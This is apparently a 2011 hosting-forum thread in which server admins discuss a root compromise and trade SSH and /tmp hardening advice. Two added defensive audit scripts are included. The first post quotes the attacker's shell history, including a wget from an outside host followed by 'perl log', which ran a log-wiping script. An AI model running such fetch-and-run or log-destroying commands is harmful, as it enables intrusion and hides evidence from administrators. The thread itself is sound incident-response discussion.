The Community Forums


How the heck did I get rooted??!??

Discussion in 'Security' started by jandafields, May 26, 2011.

Thread Status:
Not open for further replies.
  1. jandafields

    jandafields Well-Known Member

    Joined:
    May 6, 2004
    Messages:
    426
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    USA
    cPanel Access Level:
    Root Administrator
    My server was rooted, somehow. I pride myself on security, and my root password is well over 10 random numbers and letters.

    But, there they are, in the root .bash_history:

    Code:
    cd /tmp
    pico /usr/local/apache/conf/includes/errordocument.conf
    cat /etc/passwd
    service httpd restart
    service httpd restart
    chmod 000 /home
    chmod 711 /home
    wget gemicikursu.net/templates/ja_praon/log
    perl log
    id
    cat /etc/passwd
    pwd
    
    What they did was modify the error documents so that all 403 redirects show a "TeaM HITMAN HaCkEr" page along with the output of what they got with the id command (full root access).

    That "perl log" program is a server-cleaner... it deletes a lot of logs. Fortunately for me, they did not delete that perl program, and it didn't delete the .bash_history very well.

    I'm using centos 5, latest updates, latest kernel, latest apache, latest php.

    I can understand hacking a website and getting user-level access... but HOW do they get root access??? My server is hardened with most of the recommendations, except for disallowing root ssh access on 22... but that requires guessing passwords. My firewall blocks multiple password attempts.

    I have never given my password to anyone other than my datacenter.
     
  2. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    I would highly suggest blocking root SSH access to only the IP addresses you use for your systems. You can do this in WHM > Host Access Control area.

    As for how someone got onto the machine as root user, have you scanned any system you use for trojans? Also, do you change your root password whenever you provide it to your datacenter? I wouldn't let the datacenter have the root password on file. At the most, I would have a sudo user and give them that user for access. The datacenter can always single boot mode a server to get onto it, so there's no reason to provide them with the root password normally.
     
  3. jandafields

    jandafields Well-Known Member

    Joined:
    May 6, 2004
    Messages:
    426
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    USA
    cPanel Access Level:
    Root Administrator
    Yes, I use rkhunter and chkrootkit and the whm trojan scanner. They all come up clean.

    I did not change the password after giving it to the datacenter, but that would be quite an accusation against a large respected datacenter. Anyway, I have changed the password now, of course, and I will change the port as well.
     
  4. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    For trojan scanning, I meant on your systems that you connect to the server in case somehow your local system were compromised.

    As for accusing a large datacenter, I wasn't implicating anything about this being purposeful in any way. They can have security breaches as well. Look at Sony.

    Again, I highly suggest blocking SSH access to only your IP addresses. Changing the port will only minimize the attack, since attackers use port scanners to find the port a service is listening on. They cannot access SSH if all IPs are blocked besides your own.
     
  5. nobodyk

    nobodyk Well-Known Member

    Joined:
    Aug 1, 2010
    Messages:
    90
    Likes Received:
    0
    Trophy Points:
    6
    If you don't have any protection on your ssh port, then it's only a matter of time before you get rooted. I set up a test vps a few months ago; later, when I was looking for a command that I wanted to use again, I noticed other commands that I know I never used... turns out the hacker used my vps to brute force other servers. My password was 6 characters long and I was rooted in a day...

    Granted I didn't have any security on it, it was an out-of-the-box setup.

    For my servers I only use password-protected ssh keys and disable password authentication. I also have an e-mail sent if someone logs in as root. For best security, disable root logins and use key logins for the wheel user, then su to root. Though my way is a lot faster to log in and with good security. Remember to have a firewall installed like CSF, though I think cPanel also provides brute protection.
     
  6. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    At a guess, perhaps they got your password and used that to escalate to root. Could have been session sniffing (often insecure public wifi - ftp and POP both don't encrypt sessions at all), or could have been a keylogging trojan on your PC.
     
  7. arhs

    arhs Well-Known Member

    Joined:
    Jul 4, 2003
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    Use public keys for SSH authentication.
     
  8. adminlogs

    adminlogs Member

    Joined:
    May 30, 2011
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Hi,

    If you are sure your server is rooted, then it's always better to do an OS reload.

    If you still stay with the current OS, then you need to re-audit your security settings.

    From the given root history, it seems that your /tmp is not secured. A vulnerable file was executed from /tmp. It's a major security tweak. You can refer to the following URL

    http://adminlogs.info/2011/04/18/tmp-hack/

    Also an ssh port change will not have that much effect, because there are lots of port scanners available. But you can do the following
    1) Restrict ssh access to the trusted network/machine
    2) Disable direct root login.

    In my personal opinion, reload the OS, secure/tweak the new one and copy the data from the backup drive.

    Sincerely,
    http://www.adminlogs.info
     
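Two of the checks this thread keeps coming back to (password authentication and root password login turned off in sshd_config, and a /tmp that is mounted noexec/nosuid so a downloaded script cannot simply be run from there), written up as an added audit script. It is not from the thread, cPanel or adminlogs; the function names and sample configs are constructed for this example, and a missing PermitRootLogin or PasswordAuthentication line is treated as the old OpenSSH default of "yes", which is what CentOS 5 shipped.

```shell
#!/bin/sh
# Added example: audit sshd_config and fstab text for the settings the thread
# recommends. Function names and sample configs are constructed, not real files.

# check_sshd_config: reads sshd_config text on stdin, prints each weak setting.
# Returns 0 when root password login and password auth are both off, else 1.
check_sshd_config() {
    weak=0
    # Drop comments; sshd honours the FIRST occurrence of a keyword, hence "exit".
    cfg=$(sed 's/#.*//' | tr -s ' \t' ' ')
    perm=$(printf '%s\n' "$cfg" | awk 'tolower($1)=="permitrootlogin" {print tolower($2); exit}')
    pw=$(printf '%s\n' "$cfg" | awk 'tolower($1)=="passwordauthentication" {print tolower($2); exit}')
    # Assumption: a missing keyword means the old OpenSSH default of "yes".
    if [ "${perm:-yes}" = "yes" ]; then
        echo "weak: PermitRootLogin lets root log in with a password"; weak=1
    fi
    if [ "${pw:-yes}" = "yes" ]; then
        echo "weak: PasswordAuthentication is enabled (use keys only)"; weak=1
    fi
    return $weak
}

# check_tmp_fstab: reads /etc/fstab text on stdin.
# Returns 0 when /tmp is mounted noexec and nosuid, else warns and returns 1.
check_tmp_fstab() {
    opts=$(awk '$2 == "/tmp" {print $4; exit}')
    case ",$opts," in
        *,noexec,*) case ",$opts," in *,nosuid,*) return 0 ;; esac ;;
    esac
    echo "weak: /tmp lacks noexec,nosuid (options: ${opts:-not in fstab})"
    return 1
}

# Constructed samples: a default-style sshd_config beside a hardened one.
WEAK_SSHD='#PermitRootLogin yes
PasswordAuthentication yes'
HARD_SSHD='PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes'
HARD_FSTAB='/dev/sda1 / ext3 defaults 1 1
/dev/sda3 /tmp ext3 defaults,noexec,nosuid,nodev 1 2'

if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$WEAK_SSHD" | check_sshd_config || echo "weak sshd_config flagged"
    printf '%s\n' "$HARD_SSHD" | check_sshd_config && echo "hardened sshd_config OK"
    printf '%s\n' "$HARD_FSTAB" | check_tmp_fstab && echo "/tmp mount options OK"
fi
```

Run it as `sh audit.sh --demo` to see the samples, or feed the real files with `check_sshd_config < /etc/ssh/sshd_config` and `check_tmp_fstab < /etc/fstab`.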
  9. SoftDux

    SoftDux Well-Known Member

    Joined:
    May 27, 2006
    Messages:
    983
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Johannesburg, South Africa
    cPanel Access Level:
    Root Administrator
    SSH ports on all our servers are in the 50000 > 60000 range and we use brute force protection to lock out an IP address through iptables on 5 incorrect login attempts, with email notification to a few admins. Since doing this a few years ago we've never had any SSH login attempts.

    You could also use port knocking, with maybe 3 / 4 ports to knock on and then open / enable SSH for further security.
     
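The lockout rule SoftDux describes (an IP is blocked after 5 failed logins) needs a count of failed password attempts per source. As an added example that is not from the thread or from any firewall product, the function below does that count over sshd lines in the /var/log/secure format; the log lines are constructed for the example and the function name is my own. It only reports, it does not touch iptables.

```shell
#!/bin/sh
# Added example: count failed SSH password attempts per source IP from sshd
# log lines (the /var/log/secure format on CentOS) and report every source that
# reached the lockout threshold. The log lines below are constructed, not real.

SAMPLE_SECURE='May 26 03:14:01 web1 sshd[2210]: Failed password for root from 198.51.100.7 port 40211 ssh2
May 26 03:14:03 web1 sshd[2210]: Failed password for root from 198.51.100.7 port 40211 ssh2
May 26 03:14:05 web1 sshd[2212]: Failed password for invalid user admin from 198.51.100.7 port 40230 ssh2
May 26 03:14:07 web1 sshd[2214]: Failed password for root from 198.51.100.7 port 40251 ssh2
May 26 03:14:09 web1 sshd[2216]: Failed password for root from 198.51.100.7 port 40262 ssh2
May 26 03:14:11 web1 sshd[2218]: Failed password for root from 198.51.100.7 port 40270 ssh2
May 26 03:20:44 web1 sshd[2301]: Failed password for root from 203.0.113.9 port 55120 ssh2
May 26 03:20:50 web1 sshd[2301]: Failed password for root from 203.0.113.9 port 55120 ssh2
May 26 03:25:00 web1 sshd[2350]: Accepted publickey for root from 192.0.2.10 port 50022 ssh2'

# failed_ssh_sources THRESHOLD: reads sshd log lines on stdin and prints
# "count ip" for each source with at least THRESHOLD failed password attempts,
# highest count first. Accepted logins and other sshd lines are ignored.
failed_ssh_sources() {
    awk -v t="${1:-5}" '
        /sshd\[[0-9]+\]: Failed password for/ {
            # The source address is the field after "from", whether or not
            # the line carries "invalid user".
            for (i = 1; i <= NF; i++) if ($i == "from") { n[$(i+1)]++; break }
        }
        END { for (ip in n) if (n[ip] >= t) print n[ip], ip }
    ' | sort -rn
}

if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_SECURE" | failed_ssh_sources 5
fi
```

On a live host the same function can be pointed at the real log (`failed_ssh_sources 5 < /var/log/secure`); the output is the list an admin would hand to the firewall, not a firewall change in itself.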
  10. Curious Too

    Curious Too Well-Known Member

    Joined:
    Aug 31, 2001
    Messages:
    427
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    Are you using CSF Firewall? If so, have you updated to the latest version? There was an exploit in versions older than 5.30 that allowed root privilege escalation.
     
  11. anand

    anand Well-Known Member

    Joined:
    Nov 11, 2002
    Messages:
    1,435
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    DataCenter Provider
    Did you ever find out how this happened? Just happened for me on one of my remote VMs. Still trying to figure out how this happened. Found the same exact commands and the same page like you did.
     
  12. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Is this possible? The json-api has a security hole?
    I had some script kiddies hit one of my servers
    When I check the logs I see this:

    Code:
    GET /json-api/cpanel?cpanel_jsonapi_module=NVData&cpanel_jsonapi_func=set&cpanel_jsonapi_apiversion=2&names=icFAA&icFAA=%7B%22addondomain%22%3A2%2C%22analogstats%22%3A4%2C%22anonymousmsg%22%3A1%2C%22apache%22%3A3%2C%22awstats%22%3A14%2C%22chooselog%22%3A1%2C%22emailmx%22%3A1%2C%22emailroute%22%3A1%2C%22errorlogs%22%3A1%2C%22filemanager%22%3A63%2C%22ftpaccounts%22%3A3%2C%22ftpcontrol%22%3A3%2C%22hd%22%3A1%2C%22hdspace%22%3A3%2C%22image-manager%22%3A1%2C%22index%22%3A4%2C%22keys%22%3A2%2C%22latestvisitors%22%3A4%2C%22legacy_filemanager%22%3A2%2C%22manageaccounts%22%3A1%2C%22mysql%22%3A8%2C%22mysql-remoteaccess%22%3A2%2C%22nettools%22%3A4%2C%22networkmonitor%22%3A1%2C%22null%22%3A1%2C%22parkeddomains%22%3A5%2C%22password%22%3A1%2C%22password-protect%22%3A1%2C%22phpMyAdmin%22%3A9%2C%22rawaccesslogs%22%3A1%2C%22redirects%22%3A16%2C%22scripts-library%22%3A1%2C%22simplezoneedit%22%3A3%2C%22subdomains%22%3A4%2C%22submit-support%22%3A2%2C%22updatecontact%22%3A7%2C%22userfiltering%22%3A1%2C%22webalizerlog%22%3A1%2C%22webdav%22%3A4%2C%22webemail%22%3A1%2C%22php%22%3A2%2C%22lookandfeel%22%3A1%2C%22leechprotect%22%3A1%2C%22hotlinkprotect%22%3A1%2C%22ipdeny%22%3A1%2C%22getstart%22%3A1%7D&__nvdata%3A%3Anocache=1 HTTP/1.1" 403 0 "http://musicorb.com:2082/frontend/x3/index.html?post_login=18002099552856" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15"
    Seems they are trying to blow past the security with that call.
    Am I wrong? Anyone have an idea?
    And if json-api is a security risk, can we block all outside IPs from accessing it!
    I think that would have been a good idea to do as this kiddie used json-api to access multiple sites and tagged them.

    Suggest you check your cpanel logs at --> /usr/local/cpanel/logs/access_log
     
  13. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    The presence of that line in your log only shows that they attempted to get in that way, it doesn't prove that it was successful. You'd need to check logs and other things to look for time stamps lining up with the attempt, at least, to have any idea of whether it even *might* have been the successful attempt.
     
  14. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Yes, you're quite right he wasn't able to get in this time - that's because I closed the door on them and was watching what they do.
    I think if you read my post you will see I said they hit many websites by appending links to the index files.
    So it's quite clear they did get in prior to my shutting them out.
    Make no mistake about it, this code is from the same IPs that did the damage and whatever they were trying I believe it's worth looking at.

    That code kinda stands out to me as being important since it came from the people that did break in.
     
  15. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    If you believe there is a security issue with the cPanel API in some way, please submit a bug report for this to be investigated. You can go to http://go.cpanel.net/bugs or use the Bugs link at the top of the forum.
     
  16. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Will do

    My gut tells me it starts with them getting a single password for one account which they get from an FTP app using spyware of some sort.
    It seems they pickup the password on login to a single website via ftp.
    Not sure what the spyware is as I have not with high confidence found it on the PC that is / was infected.
     
  17. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    Vague gut feelings are pretty useless to everyone here. If you know exactly how they got in, and can prove it, that gives cPanel something to fix. You still don't know for sure that they got in via the link you posted - you have absolutely no idea whether it's that specific URL or some other URL. If they are breaking in via a URL, an exact URL is required - it's not just as simple as appending links to index files - it's an exact link that works, or not, and they may have tried many. This is always confused by the fact that this is often done by bots - so even if they've broken in once successfully, they may use many links before and after that don't actually constitute a problem.

    Of course, if cPanel has access to your machine they may be able to find out more by investigating. I'm not meaning to be irritating here, so apologies if I've succeeded at that - it's just that nobody can fix a fault unless the information is very specific, and it does take a little training and knowledge to learn how to be sufficiently specific.

    A common attack vector is grabbing saved FTP password files and sniffing FTP passwords over public WiFi - just letting you know this is an industry-wide problem, not cPanel-specific.
     
  18. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Well after going through it with a fine tooth comb I found the problem.
    It was not due to Cpanel but I still do not like these API calls being public.
    That code I thought was not normal is in fact normal as I see it during normal use.
    It was not spyware related which explains why I could not find any spyware.
    It wasn't due to conspiracy of any sort. They seem to be popular these days - lol

    It was due to a security problem at a support system not under my control.

    But I believe having this API system public can be a problem.
    If someone builds scripts to automate replacing websites using this API, will you then think about it?
    That is not a worst case scenario - worst case is they blast through the security somehow using an API call.
    Can it be done - if it can be done someone will do it.
     
  19. SoftDux

    SoftDux Well-Known Member

    Joined:
    May 27, 2006
    Messages:
    983
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Johannesburg, South Africa
    cPanel Access Level:
    Root Administrator
    If they can "blast through your security" then they could replace websites using FTP, SSH, cPanel UI, any billing script, etc as well. Not just API.
     
  20. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Do a google search on - json security issues

    The issue I raise is JSON as it's what the API is based on.
    Now I am not saying JSON is bad but it can have new problems which are not yet known.

    When hackers want to do things they, like you, do not want to do it manually.
    Scripts can automate tasks. And an API can be quite helpful to automate a task such as replacing all websites on a server.

    Why are you giving them the tools to do this????

    To say what you are saying is to me not making sense.

    Vin
     